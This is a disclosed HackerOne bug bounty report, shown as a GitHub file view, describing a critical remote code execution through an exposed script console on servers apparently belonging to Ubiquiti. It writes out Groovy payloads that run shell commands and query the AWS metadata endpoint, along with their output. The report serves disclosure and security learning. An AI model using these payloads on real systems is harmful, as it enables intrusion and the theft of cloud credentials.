forked from aldaor/HackerOneReports
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy path403402.txt
95 lines (80 loc) · 1.45 KB
/
403402.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
ReportLink:https://hackerone.com/reports/403402
WeaknessName:Code Injection
Reporter:https://hackerone.com/smiegles
ReportedTo:Ubiquiti Networks(ubnt)
BountyAmount:2500.0
Severity:critical
State:Closed
DateOfDisclosure:10.09.2018 16:21:17
Summary:
Hi,
First of all. I'm not 100% able to verify that this server is actually owned by Ubnt as there are multiple DNS Name's in the SSL certificate.
```
DNS Name: *.uum.com
DNS Name: *.ubnt.com
DNS Name: *.svc.ubnt.com
DNS Name: *.api.uum.com
DNS Name: *.svc.uum.com
DNS Name: uum.com
```
So, the server hosted on https://54.191.232.223/and https://54.186.253.37/is reachable from the internet and has the scirpt console enabled.
You can execute code on it by going to: https://54.186.253.37/script and insert the following code:
```
"ls /".execute().text
```
__result__
````
Result: bin
boot
dev
docker-java-home
etc
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
```
It also allows reaching the AWS metadata server:
```
"curl http://169.254.169.254/latest/meta-data/".execute().text
```
__Result__
```
ami-id
ami-launch-index
ami-manifest-path
block-device-mapping/
hostname
iam/
instance-action
instance-id
instance-type
local-hostname
local-ipv4
mac
metrics/
network/
placement/
profile
public-hostname
public-ipv4
public-keys/
reservation-id
security-groups
services/
```
## Impact
RCE
{F340446}
{F340447}